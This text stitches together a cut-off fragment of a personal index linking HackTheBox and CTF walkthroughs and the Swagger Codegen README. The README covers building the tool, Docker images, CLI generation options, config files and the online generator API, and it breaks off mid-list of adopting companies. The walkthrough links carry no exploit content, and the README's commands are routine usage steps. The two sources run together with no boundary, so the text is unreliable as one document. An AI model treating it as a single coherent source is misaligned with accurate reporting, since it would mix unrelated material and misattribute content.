[Walkthrough](https://app.hackthebox.eu/machines/Tenet) Rooted. Walkthrough comes after the box is retired. [Knife](https://app.hackthebox.eu/machines/Knife) - [Walkthrough](https://app.hackthebox.eu/machines/Knife) Rooted. Walkthrough comes after the box is retired ## HackTheBox challenges [OSINT Easy Phish](https://app.hackthebox.eu/challenges/Easy-Phish) - [Walkthrough](https://github.com/NimishMishra/networking/tree/master/hackthebox/challenges) [Web Emdee five for life](https://app.hackthebox.eu/challenges/Emdee-five-for-life) - [Walkthrough](https://github.com/NimishMishra/networking/tree/master/hackthebox/challenges) [Web Templated](https://app.hackthebox.eu/challenges/Templated) - [Walkthrough](https://github.com/NimishMishra/networking/tree/master/hackthebox/challenges) [Web Phonebook](https://app.hackthebox.eu/challenges/Phonebook) - [Walkthrough](https://github.com/NimishMishra/networking/tree/master/hackthebox/challenges) [You-know-0xDiablos](https://app.hackthebox.eu/challenges/You-know-0xDiablos) - [Walkthrough](https://github.com/NimishMishra/networking/tree/master/hackthebox/challenges) [Space](https://app.hackthebox.eu/challenges/Space) - [Walkthrough](https://github.com/NimishMishra/networking/tree/master/hackthebox/challenges) ## CTF replays A list of **replayed** CTFs - San Diego CTF 2021: [ctftime.org](https://ctftime.org/event/1255) - [walthroughs](https://github.com/NimishMishra/networking/tree/master/replayed-ctfs)
# Swagger Code Generator [![Build Status](https://img.shields.io/travis/swagger-api/swagger-codegen/master.svg?label=Petstore%20Integration%20Test)](https://travis-ci.org/swagger-api/swagger-codegen) [![Run Status](https://img.shields.io/shippable/5782588a3be4f4faa56c5bea.svg?label=Mustache%20Template%20Test)](https://app.shippable.com/projects/5782588a3be4f4faa56c5bea) [![Windows Test](https://ci.appveyor.com/api/projects/status/github/swagger-api/swagger-codegen?branch=master&svg=true&passingText=Windows%20Test%20-%20OK&failingText=Windows%20Test%20-%20Fails)](https://ci.appveyor.com/project/WilliamCheng/swagger-codegen-wh2wu) [![Maven Central](https://maven-badges.herokuapp.com/maven-central/io.swagger/swagger-codegen-project/badge.svg?style=plastic)](https://maven-badges.herokuapp.com/maven-central/io.swagger/swagger-codegen-project) [![PR Stats](http://issuestats.com/github/swagger-api/swagger-codegen/badge/pr)](http://issuestats.com/github/swagger-api/swagger-codegen) [![Issue Stats](http://issuestats.com/github/swagger-api/swagger-codegen/badge/issue)](http://issuestats.com/github/swagger-api/swagger-codegen) :star::star::star: If you would like to contribute, please refer to [guidelines](https://github.com/swagger-api/swagger-codegen/blob/master/CONTRIBUTING.md) and a list of [open tasks](https://github.com/swagger-api/swagger-codegen/issues?q=is%3Aopen+is%3Aissue+label%3A%22Need+community+contribution%22).:star::star::star: :notebook_with_decorative_cover: For more information, please refer to the [Wiki page](https://github.com/swagger-api/swagger-codegen/wiki) and [FAQ](https://github.com/swagger-api/swagger-codegen/wiki/FAQ) :notebook_with_decorative_cover: :warning: If the OpenAPI/Swagger spec is obtained from an untrusted source, please make sure you've reviewed the spec before using Swagger Codegen to generate the API client, server stub or documentation as [code injection](https://en.wikipedia.org/wiki/Code_injection) may occur :warning: :rocket: ProductHunt: https://producthunt.com/posts/swagger-codegen :rocket: ## Overview This is the swagger codegen project, which allows generation of API client libraries (SDK generation), server stubs and documentation automatically given an [OpenAPI Spec](https://github.com/OAI/OpenAPI-Specification). Currently, the following languages/frameworks are supported: - **API clients**: **ActionScript**, **Bash**, **C#** (.net 2.0, 4.0 or later), **C++** (cpprest, Qt5, Tizen), **Clojure**, **Dart**, **Elixir**, **Go**, **Groovy**, **Haskell**, **Java** (Jersey1.x, Jersey2.x, OkHttp, Retrofit1.x, Retrofit2.x, Feign), **Node.js** (ES5, ES6, AngularJS with Google Closure Compiler annotations) **Objective-C**, **Perl**, **PHP**, **Python**, **Ruby**, **Scala**, **Swift** (2.x, 3.x), **Typescript** (Angular1.x, Angular2.x, Fetch, jQuery, Node) - **Server stubs**: **C#** (ASP.NET Core, NancyFx), **Erlang**, **Go**, **Haskell**, **Java** (MSF4J, Spring, Undertow, JAX-RS: CDI, CXF, Inflector, RestEasy), **PHP** (Lumen, Slim, Silex, [Zend Expressive](https://github.com/zendframework/zend-expressive)), **Python** (Flask), **NodeJS**, **Ruby** (Sinatra, Rails5), **Scala** ([Finch](https://github.com/finagle/finch), Scalatra) - **API documentation generators**: **HTML**, **Confluence Wiki** - **Others**: **JMeter** Check out [OpenAPI-Spec](https://github.com/OAI/OpenAPI-Specification) for additional information about the OpenAPI project. # Table of contents - [Swagger Code Generator](#swagger-code-generator) - [Overview](#overview) - [Table of Contents](#table-of-contents) - Installation - [Compatibility](#compatibility) - [Prerequisites](#prerequisites) - [OS X Users](#os-x-users) - [Building](#building) - [Docker](#docker) - [Build and run](#build-and-run-using-docker) - [Run docker in Vagrant](#run-docker-in-vagrant) - [Public Docker image](#public-docker-image) - [Homebrew](#homebrew) - [Getting Started](#getting-started) - Generators - [To generate a sample client library](#to-generate-a-sample-client-library) - [Generating libraries from your server](#generating-libraries-from-your-server) - [Modifying the client library format](#modifying-the-client-library-format) - [Making your own codegen modules](#making-your-own-codegen-modules) - [Where is Javascript???](#where-is-javascript) - [Generating a client from local files](#generating-a-client-from-local-files) - [Customizing the generator](#customizing-the-generator) - [Validating your OpenAPI Spec](#validating-your-openapi-spec) - [Generating dynamic html api documentation](#generating-dynamic-html-api-documentation) - [Generating static html api documentation](#generating-static-html-api-documentation) - [To build a server stub](#to-build-a-server-stub) - [To build the codegen library](#to-build-the-codegen-library) - [Workflow Integration](#workflow-integration) - [Github Integration](#github-integration) - [Online Generators](#online-generators) - [Guidelines for Contribution](https://github.com/swagger-api/swagger-codegen/wiki/Guidelines-for-Contribution) - [Companies/Projects using Swagger Codegen](#companiesprojects-using-swagger-codegen) - [Swagger Codegen Core Team](#swagger-codegen-core-team) - [Swagger Codegen Evangelist](#swagger-codegen-evangelist) - [License](#license) ## Compatibility The OpenAPI Specification has undergone 3 revisions since initial creation in 2010. The swagger-codegen project has the following compatibilities with the OpenAPI Specification: Swagger Codegen Version | Release Date | OpenAPI Spec compatibility | Notes -------------------------- | ------------ | -------------------------- | ----- 2.3.0 (upcoming minor release) | Apr/May 2017 | 1.0, 1.1, 1.2, 2.0 | Minor release with breaking changes 2.2.3 (upcoming patch release) | TBD | 1.0, 1.1, 1.2, 2.0 | Patch release without breaking changes 2.2.2 (**current stable**) | 2017-03-01 | 1.0, 1.1, 1.2, 2.0 | [tag v2.2.2](https://github.com/swagger-api/swagger-codegen/tree/v2.2.2) 2.2.1 | 2016-08-07 | 1.0, 1.1, 1.2, 2.0 | [tag v2.2.1](https://github.com/swagger-api/swagger-codegen/tree/v2.2.1) 2.1.6 | 2016-04-06 | 1.0, 1.1, 1.2, 2.0 | [tag v2.1.6](https://github.com/swagger-api/swagger-codegen/tree/v2.1.6) 2.0.17 | 2014-08-22 | 1.1, 1.2 | [tag v2.0.17](https://github.com/swagger-api/swagger-codegen/tree/v2.0.17) 1.0.4 | 2012-04-12 | 1.0, 1.1 | [tag v1.0.4](https://github.com/swagger-api/swagger-codegen/tree/swagger-codegen_2.9.1-1.1) ### Prerequisites If you're looking for the latest stable version, you can grab it directly from Maven.org (Java 7 runtime at a minimum): ``` wget http://central.maven.org/maven2/io/swagger/swagger-codegen-cli/2.2.2/swagger-codegen-cli-2.2.2.jar -O swagger-codegen-cli.jar java -jar swagger-codegen-cli.jar help ``` On a mac, it's even easier with `brew`: ``` brew install swagger-codegen ``` To build from source, you need the following installed and available in your $PATH: * [Java 7 or 8](http://java.oracle.com) * [Apache maven 3.3.3 or greater](http://maven.apache.org/) #### OS X Users Don't forget to install Java 7 or 8. You probably have 1.6. Export JAVA_HOME in order to use the supported Java version: ``` export JAVA_HOME=`/usr/libexec/java_home -v 1.8` export PATH=${JAVA_HOME}/bin:$PATH ``` ### Building After cloning the project, you can build it from source with this command: ``` mvn clean package ``` ### Homebrew To install, run `brew install swagger-codegen` Here is an example usage: ``` swagger-codegen generate -i http://petstore.swagger.io/v2/swagger.json -l ruby -o /tmp/test/ ``` ### Docker #### Development in docker You can use `run-in-docker.sh` to do all development. This script maps your local repository to `/gen` in the docker container. It also maps `~/.m2/repository` to the appropriate container location. To execute `mvn package`: ``` git clone https://github.com/swagger-api/swagger-codegen cd swagger-codegen ./run-in-docker.sh mvn package ``` Build artifacts are now accessible in your working directory. Once built, `run-in-docker.sh` will act as an executable for swagger-codegen-cli. To generate code, you'll need to output to a directory under `/gen` (e.g. `/gen/out`). For example: ``` ./run-in-docker.sh help # Executes 'help' command for swagger-codegen-cli ./run-in-docker.sh langs # Executes 'langs' command for swagger-codegen-cli ./run-in-docker.sh /gen/bin/go-petstore.sh # Builds the Go client ./run-in-docker.sh generate -i modules/swagger-codegen/src/test/resources/2_0/petstore.yaml \ -l go -o /gen/out/go-petstore -DpackageName=petstore # generates go client, outputs locally to ./out/go-petstore ``` #### Run Docker in Vagrant Prerequisite: install [Vagrant](https://www.vagrantup.com/downloads.html) and [VirtualBox](https://www.virtualbox.org/wiki/Downloads). ``` git clone http://github.com/swagger-api/swagger-codegen.git cd swagger-codegen vagrant up vagrant ssh cd /vagrant ./run-in-docker.sh mvn package ``` #### Public Pre-built Docker images - https://hub.docker.com/r/swaggerapi/swagger-generator/ (official web service) - https://hub.docker.com/r/swaggerapi/swagger-codegen-cli/ (official CLI) ##### Swagger Generator Docker Image The Swagger Generator image can act as a self-hosted web application and API for generating code. This container can be incorporated into a CI pipeline, and requires at least two HTTP requests and some docker orchestration to access generated code. Example usage (note this assumes `jq` is installed for command line processing of JSON): ``` # Start container and save the container id CID=$(docker run -d swaggerapi/swagger-generator) # allow for startup sleep 5 # Get the IP of the running container GEN_IP=$(docker inspect --format '{{.NetworkSettings.IPAddress}}' $CID) # Execute an HTTP request and store the download link RESULT=$(curl -X POST --header 'Content-Type: application/json' --header 'Accept: application/json' -d '{ "swaggerUrl": "http://petstore.swagger.io/v2/swagger.json" }' 'http://localhost:8188/api/gen/clients/javascript' | jq '.link' | tr -d '"') # Download the generated zip and redirect to a file curl $RESULT > result.zip # Shutdown the swagger generator image docker stop $CID && docker rm $CID ``` In the example above, `result.zip` will contain the generated client. ##### Swagger Codegen CLI Docker Image The Swagger Codegen image acts as a standalone executable. It can be used as an alternative to installing via homebrew, or for developers who are unable to install Java or upgrade the installed version. To generate code with this image, you'll need to mount a local location as a volume. Example: ``` docker run --rm -v ${PWD}:/local swaggerapi/swagger-codegen-cli generate \ -i http://petstore.swagger.io/v2/swagger.json \ -l go \ -o /local/out/go ``` The generated code will be located under `./out/go` in the current directory. ## Getting Started To generate a PHP client for http://petstore.swagger.io/v2/swagger.json, please run the following ```sh git clone https://github.com/swagger-api/swagger-codegen cd swagger-codegen mvn clean package java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \ -i http://petstore.swagger.io/v2/swagger.json \ -l php \ -o /var/tmp/php_api_client ``` (if you're on Windows, replace the last command with `java -jar modules\swagger-codegen-cli\target\swagger-codegen-cli.jar generate -i http://petstore.swagger.io/v2/swagger.json -l php -o c:\temp\php_api_client`) You can also download the JAR (latest release) directly from [maven.org](http://central.maven.org/maven2/io/swagger/swagger-codegen-cli/2.2.2/swagger-codegen-cli-2.2.2.jar) To get a list of **general** options available, please run `java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar help generate` To get a list of PHP specified options (which can be passed to the generator with a config file via the `-c` option), please run `java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar config-help -l php` ## Generators ### To generate a sample client library You can build a client against the swagger sample [petstore](http://petstore.swagger.io) API as follows: ``` ./bin/java-petstore.sh ``` (On Windows, run `.\bin\windows\java-petstore.bat` instead) This will run the generator with this command: ``` java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \ -i http://petstore.swagger.io/v2/swagger.json \ -l java \ -o samples/client/petstore/java ``` with a number of options. You can get the options with the `help generate` command: ``` NAME swagger-codegen-cli generate - Generate code with chosen lang SYNOPSIS swagger-codegen-cli generate [(-a <authorization> | --auth <authorization>)] [--additional-properties <additional properties>] [--api-package <api package>] [--artifact-id <artifact id>] [--artifact-version <artifact version>] [(-c <configuration file> | --config <configuration file>)] [-D <system properties>] [--group-id <group id>] (-i <spec file> | --input-spec <spec file>) [--import-mappings <import mappings>] [--instantiation-types <instantiation types>] [--invoker-package <invoker package>] (-l <language> | --lang <language>) [--language-specific-primitives <language specific primitives>] [--library <library>] [--model-package <model package>] [(-o <output directory> | --output <output directory>)] [(-s | --skip-overwrite)] [(-t <template directory> | --template-dir <template directory>)] [--type-mappings <type mappings>] [(-v | --verbose)] OPTIONS -a <authorization>, --auth <authorization> adds authorization headers when fetching the swagger definitions remotely. Pass in a URL-encoded string of name:header with a comma separating multiple values --additional-properties <additional properties> sets additional properties that can be referenced by the mustache templates in the format of name=value,name=value --api-package <api package> package for generated api classes --artifact-id <artifact id> artifactId in generated pom.xml --artifact-version <artifact version> artifact version in generated pom.xml -c <configuration file>, --config <configuration file> Path to json configuration file. File content should be in a json format {"optionKey":"optionValue", "optionKey1":"optionValue1"...} Supported options can be different for each language. Run config-help -l {lang} command for language specific config options. -D <system properties> sets specified system properties in the format of name=value,name=value --group-id <group id> groupId in generated pom.xml -i <spec file>, --input-spec <spec file> location of the swagger spec, as URL or file (required) --import-mappings <import mappings> specifies mappings between a given class and the import that should be used for that class in the format of type=import,type=import --instantiation-types <instantiation types> sets instantiation type mappings in the format of type=instantiatedType,type=instantiatedType.For example (in Java): array=ArrayList,map=HashMap. In other words array types will get instantiated as ArrayList in generated code. --invoker-package <invoker package> root package for generated code -l <language>, --lang <language> client language to generate (maybe class name in classpath, required) --language-specific-primitives <language specific primitives> specifies additional language specific primitive types in the format of type1,type2,type3,type3. For example: String,boolean,Boolean,Double --library <library> library template (sub-template) --model-package <model package> package for generated models -o <output directory>, --output <output directory> where to write the generated files (current dir by default) -s, --skip-overwrite specifies if the existing files should be overwritten during the generation. -t <template directory>, --template-dir <template directory> folder containing the template files --type-mappings <type mappings> sets mappings between swagger spec types and generated code types in the format of swaggerType=generatedType,swaggerType=generatedType. For example: array=List,map=Map,string=String --reserved-words-mappings <import mappings> specifies how a reserved name should be escaped to. Otherwise, the default _<name> is used. For example id=identifier -v, --verbose verbose mode ``` You can then compile and run the client, as well as unit tests against it: ``` cd samples/client/petstore/java mvn package ``` Other languages have petstore samples, too: ``` ./bin/android-petstore.sh ./bin/java-petstore.sh ./bin/objc-petstore.sh ``` ### Generating libraries from your server It's just as easy--just use the `-i` flag to point to either a server or file. ### Modifying the client library format Don't like the default swagger client syntax? Want a different language supported? No problem! Swagger codegen processes mustache templates with the [jmustache](https://github.com/samskivert/jmustache) engine. You can modify our templates or make your own. You can look at `modules/swagger-codegen/src/main/resources/${your-language}` for examples. To make your own templates, create your own files and use the `-t` flag to specify your template folder. It actually is that easy. ### Making your own codegen modules If you're starting a project with a new language and don't see what you need, swagger-codegen can help you create a project to generate your own libraries: ``` java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar meta \ -o output/myLibrary -n myClientCodegen -p com.my.company.codegen ``` This will write, in the folder `output/myLibrary`, all the files you need to get started, including a README.md. Once modified and compiled, you can load your library with the codegen and generate clients with your own, custom-rolled logic. You would then compile your library in the `output/myLibrary` folder with `mvn package` and execute the codegen like such: ``` java -cp output/myLibrary/target/myClientCodegen-swagger-codegen-1.0.0.jar:modules/swagger-codegen-cli/target/swagger-codegen-cli.jar io.swagger.codegen.SwaggerCodegen ``` For Windows users, you will need to use `;` instead of `:` in the classpath, e.g. ``` java -cp output/myLibrary/target/myClientCodegen-swagger-codegen-1.0.0.jar;modules/swagger-codegen-cli/target/swagger-codegen-cli.jar io.swagger.codegen.SwaggerCodegen ``` Note the `myClientCodegen` is an option now, and you can use the usual arguments for generating your library: ``` java -cp output/myLibrary/target/myClientCodegen-swagger-codegen-1.0.0.jar:modules/swagger-codegen-cli/target/swagger-codegen-cli.jar \ io.swagger.codegen.SwaggerCodegen generate -l myClientCodegen\ -i http://petstore.swagger.io/v2/swagger.json \ -o myClient ``` ### Where is Javascript??? See our [javascript library](http://github.com/swagger-api/swagger-js)--it's completely dynamic and doesn't require static code generation. There is a third-party component called [swagger-js-codegen](https://github.com/wcandillon/swagger-js-codegen) that can generate angularjs or nodejs source code from a OpenAPI Specification. :exclamation: On Dec 7th 2015, a Javascript API client generator has been added by @jfiala. ### Generating a client from local files If you don't want to call your server, you can save the OpenAPI Spec files into a directory and pass an argument to the code generator like this: ``` -i ./modules/swagger-codegen/src/test/resources/2_0/petstore.json ``` Great for creating libraries on your ci server, from the [Swagger Editor](http://editor.swagger.io)... or while coding on an airplane. ### Selective generation You may not want to generate *all* models in your project. Likewise you may want just one or two apis to be written. If that's the case, you can use system properties to control the output: The default is generate *everything* supported by the specific library. Once you enable a feature, it will restrict the contents generated: ``` # generate only models java -Dmodels {opts} # generate only apis java -Dapis {opts} # generate only supporting files java -DsupportingFiles # generate models and supporting files java -Dmodels -DsupportingFiles ``` To control the specific files being generated, you can pass a CSV list of what you want: ``` # generate the User and Pet models only -Dmodels=User,Pet # generate the User model and the supportingFile `StringUtil.java`: -Dmodels=User -DsupportingFiles=StringUtil.java ``` To control generation of docs and tests for api and models, pass false to the option. For api, these options are `-DapiTests=false` and `-DapiDocs=false`. For models, `-DmodelTests=false` and `-DmodelDocs=false`. These options default to true and don't limit the generation of the feature options listed above (like `-Dapi`): ``` # generate only models (with tests and documentation) java -Dmodels {opts} # generate only models (with tests but no documentation) java -Dmodels -DmodelDocs=false {opts} # generate only User and Pet models (no tests and no documentation) java -Dmodels=User,Pet -DmodelTests=false {opts} # generate only apis (without tests) java -Dapis -DapiTests=false {opts} # generate only apis (modelTests option is ignored) java -Dapis -DmodelTests=false {opts} ``` When using selective generation, _only_ the templates needed for the specific generation will be used. ### Ignore file format Swagger codegen supports a `.swagger-codegen-ignore` file, similar to `.gitignore` or `.dockerignore` you're probably already familiar with. The ignore file allows for better control over overwriting existing files than the `--skip-overwrite` flag. With the ignore file, you can specify individual files or directories can be ignored. This can be useful, for example if you only want a subset of the generated code. Examples: ``` # Swagger Codegen Ignore # Lines beginning with a # are comments # This should match build.sh located anywhere. build.sh # Matches build.sh in the root /build.sh # Exclude all recursively docs/** # Explicitly allow files excluded by other rules !docs/UserApi.md # Recursively exclude directories named Api # You can't negate files below this directory. src/**/Api/ # When this file is nested under /Api (excluded above), # this rule is ignored because parent directory is excluded by previous rule. !src/**/PetApiTests.cs # Exclude a single, nested file explicitly src/IO.Swagger.Test/Model/AnimalFarmTests.cs ``` The `.swagger-codegen-ignore` file must exist in the root of the output directory. ### Customizing the generator There are different aspects of customizing the code generator beyond just creating or modifying templates. Each language has a supporting configuration file to handle different type mappings, etc: ``` $ ls -1 modules/swagger-codegen/src/main/java/io/swagger/codegen/languages/ AbstractJavaJAXRSServerCodegen.java AbstractTypeScriptClientCodegen.java AkkaScalaClientCodegen.java AndroidClientCodegen.java AspNet5ServerCodegen.java AspNetCoreServerCodegen.java AsyncScalaClientCodegen.java BashClientCodegen.java CSharpClientCodegen.java ClojureClientCodegen.java CsharpDotNet2ClientCodegen.java DartClientCodegen.java FlashClientCodegen.java FlaskConnexionCodegen.java GoClientCodegen.java HaskellServantCodegen.java JMeterCodegen.java JavaCXFServerCodegen.java JavaClientCodegen.java JavaInflectorServerCodegen.java JavaJerseyServerCodegen.java JavaResteasyServerCodegen.java JavascriptClientCodegen.java NodeJSServerCodegen.java NancyFXServerCodegen ObjcClientCodegen.java PerlClientCodegen.java PhpClientCodegen.java PythonClientCodegen.java Qt5CPPGenerator.java RubyClientCodegen.java ScalaClientCodegen.java ScalatraServerCodegen.java SilexServerCodegen.java SinatraServerCodegen.java SlimFrameworkServerCodegen.java SpringMVCServerCodegen.java StaticDocCodegen.java StaticHtmlGenerator.java SwaggerGenerator.java SwaggerYamlGenerator.java SwiftCodegen.java TizenClientCodegen.java TypeScriptAngularClientCodegen.java TypeScriptNodeClientCodegen.java ``` Each of these files creates reasonable defaults so you can get running quickly. But if you want to configure package names, prefixes, model folders, etc. you can use a json config file to pass the values. ``` java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \ -i http://petstore.swagger.io/v2/swagger.json \ -l java \ -o samples/client/petstore/java \ -c path/to/config.json ``` and `config.json` contains the following as an example: ``` { "apiPackage" : "petstore" } ``` Supported config options can be different per language. Running `config-help -l {lang}` will show available options. **These options are applied via configuration file (e.g. config.json) or by passing them with `-D{optionName}={optionValue}`**. (If `-D{optionName}` does not work, please open a [ticket](https://github.com/swagger-api/swagger-codegen/issues/new) and we'll look into it) ``` java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar config-help -l java ``` Output ``` CONFIG OPTIONS modelPackage package for generated models apiPackage package for generated api classes sortParamsByRequiredFlag Sort method arguments to place required parameters before optional parameters. Default: true invokerPackage root package for generated code groupId groupId in generated pom.xml artifactId artifactId in generated pom.xml artifactVersion artifact version in generated pom.xml sourceFolder source folder for generated code localVariablePrefix prefix for generated code members and local variables serializableModel boolean - toggle "implements Serializable" for generated models library library template (sub-template) to use: jersey1 - HTTP client: Jersey client 1.18. JSON processing: Jackson 2.4.2 jersey2 - HTTP client: Jersey client 2.6 feign - HTTP client: Netflix Feign 8.1.1. JSON processing: Jackson 2.6.3 okhttp-gson (default) - HTTP client: OkHttp 2.4.0. JSON processing: Gson 2.3.1 retrofit - HTTP client: OkHttp 2.4.0. JSON processing: Gson 2.3.1 (Retrofit 1.9.0) retrofit2 - HTTP client: OkHttp 2.5.0. JSON processing: Gson 2.4 (Retrofit 2.0.0-beta2) ``` Your config file for Java can look like ```json { "groupId":"com.my.company", "artifactId":"MyClient", "artifactVersion":"1.2.0", "library":"feign" } ``` For all the unspecified options default values will be used. Another way to override default options is to extend the config class for the specific language. To change, for example, the prefix for the Objective-C generated files, simply subclass the ObjcClientCodegen.java: ```java package com.mycompany.swagger.codegen; import io.swagger.codegen.languages.*; public class MyObjcCodegen extends ObjcClientCodegen { static { PREFIX = "HELO"; } } ``` and specify the `classname` when running the generator: ``` -l com.mycompany.swagger.codegen.MyObjcCodegen ``` Your subclass will now be loaded and overrides the `PREFIX` value in the superclass. ### Bringing your own models Sometimes you don't want a model generated. In this case, you can simply specify an import mapping to tell the codegen what _not_ to create. When doing this, every location that references a specific model will refer back to your classes. Note, this may not apply to all languages... To specify an import mapping, use the `--import-mappings` argument and specify the model-to-import logic as such: ``` --import-mappings Pet=my.models.MyPet ``` Or for multiple mappings: ``` Pet=my.models.MyPet,Order=my.models.MyOrder ``` ### Validating your OpenAPI Spec You have options. The easiest is to use our [online validator](https://github.com/swagger-api/validator-badge) which not only will let you validate your spec, but with the debug flag, you can see what's wrong with your spec. For example: http://online.swagger.io/validator/debug?url=http://petstore.swagger.io/v2/swagger.json ### Generating dynamic html api documentation To do so, just use the `-l dynamic-html` flag when reading a spec file. This creates HTML documentation that is available as a single-page application with AJAX. To view the documentation: ``` cd samples/dynamic-html/ npm install node . ``` Which launches a node.js server so the AJAX calls have a place to go. ### Generating static html api documentation To do so, just use the `-l html` flag when reading a spec file. This creates a single, simple HTML file with embedded css so you can ship it as an email attachment, or load it from your filesystem: ``` cd samples/html/ open index.html ``` ### To build a server stub Please refer to https://github.com/swagger-api/swagger-codegen/wiki/Server-stub-generator-HOWTO for more information. ### To build the codegen library This will create the swagger-codegen library from source. ``` mvn package ``` Note! The templates are included in the library generated. If you want to modify the templates, you'll need to either repackage the library OR specify a path to your scripts ## Workflow integration You can use the [swagger-codegen-maven-plugin](modules/swagger-codegen-maven-plugin/README.md) for integrating with your workflow, and generating any codegen target. ## GitHub Integration To push the auto-generated SDK to GitHub, we provide `git_push.sh` to streamline the process. For example: 1) Create a new repository in GitHub (Ref: https://help.github.com/articles/creating-a-new-repository/) 2) Generate the SDK ``` java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \ -i modules/swagger-codegen/src/test/resources/2_0/petstore.json -l perl \ --git-user-id "wing328" \ --git-repo-id "petstore-perl" \ --release-note "Github integration demo" \ -o /var/tmp/perl/petstore ``` 3) Push the SDK to GitHub ``` cd /var/tmp/perl/petstore /bin/sh ./git_push.sh ``` ## Online generators One can also generate API client or server using the online generators (https://generator.swagger.io) For example, to generate Ruby API client, simply send the following HTTP request using curl: ``` curl -X POST -H "content-type:application/json" -d '{"swaggerUrl":"http://petstore.swagger.io/v2/swagger.json"}' https://generator.swagger.io/api/gen/clients/ruby ``` Then you will receieve a JSON response with the URL to download the zipped code. To customize the SDK, you can `POST` to `https://generator.swagger.io/gen/clients/{language}` with the following HTTP body: ``` { "options": {}, "swaggerUrl": "http://petstore.swagger.io/v2/swagger.json" } ``` in which the `options` for a language can be obtained by submitting a `GET` request to `https://generator.swagger.io/api/gen/clients/{language}`: For example, `curl https://generator.swagger.io/api/gen/clients/python` returns ``` { "packageName":{ "opt":"packageName", "description":"python package name (convention: snake_case).", "type":"string", "default":"swagger_client" }, "packageVersion":{ "opt":"packageVersion", "description":"python package version.", "type":"string", "default":"1.0.0" }, "sortParamsByRequiredFlag":{ "opt":"sortParamsByRequiredFlag", "description":"Sort method arguments to place required parameters before optional parameters.", "type":"boolean", "default":"true" } } ``` To set package name to `pet_store`, the HTTP body of the request is as follows: ``` { "options": { "packageName": "pet_store" }, "swaggerUrl": "http://petstore.swagger.io/v2/swagger.json" } ``` and here is the curl command: ``` curl -H "Content-type: application/json" -X POST -d '{"options": {"packageName": "pet_store"},"swaggerUrl": "http://petstore.swagger.io/v2/swagger.json"}' https://generator.swagger.io/api/gen/clients/python ``` Guidelines for Contribution --------------------------- Please refer to this [page](https://github.com/swagger-api/swagger-codegen/blob/master/CONTRIBUTING.md) Companies/Projects using Swagger Codegen ---------------------------------------- Here are some companies/projects using Swagger Codegen in production. To add your company/project to the list, please visit [README.md](https://github.com/swagger-api/swagger-codegen/blob/master/README.md) and click on the icon to edit the page. - [Activehours](https://www.activehours.com/) - [Acunetix](https://www.acunetix.com/) - [Atlassian](https://www.atlassian.com/) - [Autodesk](http://www.autodesk.com/) - [Avenida Compras S.A.](https://www.avenida.com.ar) - [AYLIEN](http://aylien.com/) - [Balance Internet](https://www.balanceinternet.com.au/) - [beemo](http://www.beemo.eu) - [bitly](https://bitly.com) - [Bufferfly Network](https://www.butterflynetinc.com/) - [Cachet Financial](http://www.cachetfinancial.com/) - [carpolo](http://www.carpolo.co/) - [CloudBoost](https://www.CloudBoost.io/) - [Conplement](http://www.conplement.de/) - [Cummins](http://www.cummins.com/) - [Cupix](http://www.cupix.com) - [DBBest Technologies](https://www.dbbest.com) - [DecentFoX](http://decentfox.com/) - [DocuSign](https://www.docusign.com) - [Ergon](http://www.ergon.ch/) - [EMC](https://www.emc.com/) - [eureka](http://eure.jp/) - [everystory.us](http://everystory.us) - [Expected Behavior](http://www.expectedbehavior.com/) - [Fastly](https://www.fastly.com/) - [Flat](https://flat.io) - [Finder](http://en.finder.pl/) - [FH Mรผnster - University of Applied Sciences](http://www.fh-muenster.de) - [Fotition](https://www.fotition.com/) - [Gear Zero Network](https://www.gearzero.ca) - [Germin8](http://www.germin8.com) - [goTransverse](http://www.gotransverse.com/api) - [GraphHopper](https://graphhopper.com/) - [Gravitate Solutions](http://gravitatesolutions.com/) - [HashData](http://www.hashdata.cn/) - [Hewlett Packard Enterprise](https://hpe.com) - [High Technologies Center](http://htc-cs.com) - [IMS Health](http://www.imshealth.com/en/solution-areas/technology-and-applications) - [Intent HQ](http://www.intenthq.com) - [Interactive Intelligence](http://developer.mypurecloud.com/) - [Kabuku](http://www.kabuku.co.jp/en) - [Kurio](https://kurio.co.id) - [Kuroi](http://kuroiwebdesign.com/) - [Kuary](https://kuary.com/) - [Kubernetes](https://kubernetes.io/) - [LANDR Audio](https://www.landr.com/) - [Lascaux](http://www.lascaux.it/) - [Leica Geosystems AG](http://leica-geosystems.com) - [LiveAgent](https://www.ladesk.com/) - [LXL Tech](http://lxltech.com) - [Lyft](https://www.lyft.com/developers) - [MailMojo](https://mailmojo.no/) - [Mindera](http://mindera.com/) - [Mporium](http://mporium.com/) - [Neverfail](https://neverfail.com/) - [nViso](http://www.nviso.ch/) - [Okiok](https://www.okiok.com) - [Onedata](http://onedata.org) - [OrderCloud.io](http://ordercloud.io) - [OSDN](https://osdn.jp) - [PagerDuty](https://www.pagerduty.com) - [PagerTree](https://pagertree.com) - [Pepipost](https://www.pepipost.com) - [Plexxi](http://www.plexxi.com) - [Pixoneye](http://www.pixoneye.com/) - [PostAffiliatePro](https://www.postaffiliatepro.com/) - [PracticeBird](https://www.practicebird.com/) - [Prill Tecnologia](http://www.prill.com.br) - [QAdept](http://qadept.com/) - [QuantiModo](https://quantimo.do/) - [QuickBlox](https://quickblox.com/) - [Rapid7](https://rapid7.com/) - [Reload! A/S](https://reload.dk/) - [REstore](https://www.restore.eu) - [Revault Sร rl](http://revault.ch) - [Riffyn](https://riffyn.com) - [Royal Bank of Canada (RBC)](http://www.rbc.com/canada.html) - [Saritasa](https://www.saritasa.com/) - [SCOOP Software GmbH](http://www.scoop-software.de) - [Shine Solutions](https://shinesolutions.com/) - [Simpfony](https://www.simpfony.com/) - [Skurt](http://www.skurt.com) - [Slamby](https://www.slamby.com/) - [SmartRecruiters](https://www.smartrecruiters.com/) - [snapCX](https://snapcx.io) - [SPINEN](http://www.spinen.com) - [SRC](https://www.src.si/) - [Stingray](http://www.stingray.com) - [StyleRecipe](http://stylerecipe.co.jp) - [Svenska Spel AB](https://www.svenskaspel.se/) - [TaskData](http://www.taskdata.com/) - [ThoughtWorks](https://www.thoughtworks.com) - [Upwork](http://upwork.com/) - [uShip](https://www.uship.com/) - [VMware](https://vmware.com/) - 